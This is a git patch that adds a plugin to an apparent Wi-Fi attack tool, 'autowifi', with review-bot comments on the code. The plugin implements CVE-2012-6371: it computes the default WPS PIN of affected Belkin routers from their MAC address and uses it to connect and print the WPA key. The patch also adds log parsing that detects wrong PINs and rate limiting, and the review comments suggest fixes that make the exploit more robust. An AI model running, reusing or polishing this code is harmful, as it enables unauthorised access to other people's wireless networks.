From 5995257992d9b4d86313e3d78a85b68ffff0a2af Mon Sep 17 00:00:00 2001 From: makefu Date: Sun, 26 May 2013 14:06:53 +0200 Subject: add belkin WPS plugin --- usr/lib/autowifi/lib/wps | 16 ++++++++---- usr/lib/autowifi/plugins/11belkin_wps | 48 +++++++++++++++++++++++++++++++++++ 2 files changed, 59 insertions(+), 5 deletions(-) create mode 100755 usr/lib/autowifi/plugins/11belkin_wps diff --git a/usr/lib/autowifi/lib/wps b/usr/lib/autowifi/lib/wps index 7fd38a26..8afd5b05 100644 --- a/usr/lib/autowifi/lib/wps +++ b/usr/lib/autowifi/lib/wps @@ -35,17 +35,23 @@ EOF #*"WPA: Key negotiation completed"*) # association failed # exit 1 ;; + if ( tail -f $WPA_LOG & echo "TAILPID: $!" )| while read line ; do + bye(){ + kill -HUP $TAILPID + exit $1 + } + echo $line case "$line" in - TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + TAILPID:*)IFS=" " set -- $line; TAILPID=$2;; + *"WPS-FAIL msg=10 config_error=18"*) bye 1 ;; # wrong pin + *"CTRL-EVENT-EAP-FAILURE EAP authentication failed"*) bye 1;; # rate limiting *CTRL-EVENT-DISCONNECTED*):;; - *CTRL-EVENT-CONNECTED*) - kill -HUP $TAILPID - exit 0;; + *CTRL-EVENT-CONNECTED*) bye 0;; #yay connected esac done ; then - echo "Connected!" + #echo "Connected!" sed -n 's/[ \t]*psk="\(.*\)"$/\1/p' $WPA_CONF return 0 else diff --git a/usr/lib/autowifi/plugins/11belkin_wps b/usr/lib/autowifi/plugins/11belkin_wps new file mode 100755 index 00000000..93dd447a --- /dev/null +++ b/usr/lib/autowifi/plugins/11belkin_wps 
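Review bot: In usr/lib/autowifi/lib/wps the added `echo $line` writes every wpa_supplicant log line to stdout, the same stream on which the function prints the key via `sed -n … $WPA_CONF`; the commit comments out `echo "Connected!"`, which suggests stdout is meant to carry only the PSK. Log lines can contain text chosen by the remote access point (for example the SSID), and the unquoted expansion exposes it to word splitting and globbing, so I would write `printf '%s\n' "$line" >&2` and read with `read -r line`. `bye()` is also redefined on every loop iteration, and `kill -HUP $TAILPID` runs with an empty argument if a matching line arrives before the `TAILPID:` line has been read; defining it once above the loop with `[ -n "$TAILPID" ] && kill -HUP "$TAILPID"` covers both. The enclosing function starts and ends outside the hunk.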
@@ -0,0 +1,48 @@
+#!/bin/sh
+# thanks to http://ednolo.alumnos.upv.es/?p=1295G
+# for the PoC code
+# Calculates the default WPS pin of Belkin Routers and returns the WPA key
+#
+# Implementation of CVE-2012-6371
+
+# works :
+# Belkin_N+_XXXXXX 00:22:75:XX:XX:XX F5D8235-4 v1000
+# belkin.XXX 00:1C:DF:XX:XX:XX F5D8231-4 v5000
+# belkin.XXX 09:86:3B:XX:XX:XX F9K1104 v1000
+
+cd $(dirname $(readlink -f $0))
+. ../lib/core
+. ../lib/wps
+parse_args $@
+
+MAC=$(printf "%s" $2| sed 's/://g')
+if [ ${#MAC} -ne 12 ] ;then
+ echo "MAC malformed"
+ exit 1
+fi
+VENDOR_MAC=${MAC:0:6}
+PRIVATE_MAC=${MAC:6:12}
+if ! [ $VENDOR_MAC == "002275" -o $VENDOR_MAC == "001CDF" -o $VENDOR_MAC == "09863B" ] ;then
+ echo "VENDOR MAC $VENDOR_MAC not affected"
+ exit 1
+fi
+
+calc_belkin(){
+ PRIVATE_MAC=${1}
+
+ p=$((0x$PRIVATE_MAC % 10000000))
+ wps_pin_checksum(){
+ pin=$1
+ accum=0
+ while [ $pin -ne 0 ];do
+ accum=$((accum + (3 * (pin % 10)) ))
+ pin=$((pin/10))
+ accum=$((accum + pin %10 ))
+ pin=$((pin/10))
+ done
+ echo $(( (10 - accum % 10) % 10))
+ }
+ printf "%07d%d" $p $(wps_pin_checksum $p)
+ return 0
+}
+try_wps_pin $@ $(calc_belkin ${PRIVATE_MAC})
-- cgit v1.2.3
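Review bot: In usr/lib/autowifi/plugins/11belkin_wps the MAC taken from `$2` is checked only for length before its trailing characters are interpolated into `$((0x$PRIVATE_MAC % 10000000))`, so a non-hex value reaches shell arithmetic evaluation instead of the "MAC malformed" exit. A character-class check before the split closes that: `case "$MAC" in *[!0-9A-Fa-f]*) echo "MAC malformed"; exit 1;; esac`. The script also declares `#!/bin/sh` while using `${MAC:0:6}` and `==` inside `[ ]`, neither of which is POSIX, so it breaks under a strict /bin/sh such as dash; either the shebang should name bash or those constructs should be replaced. The positional parameters should be quoted as well, `parse_args "$@"` and `printf "%s" "$2"`.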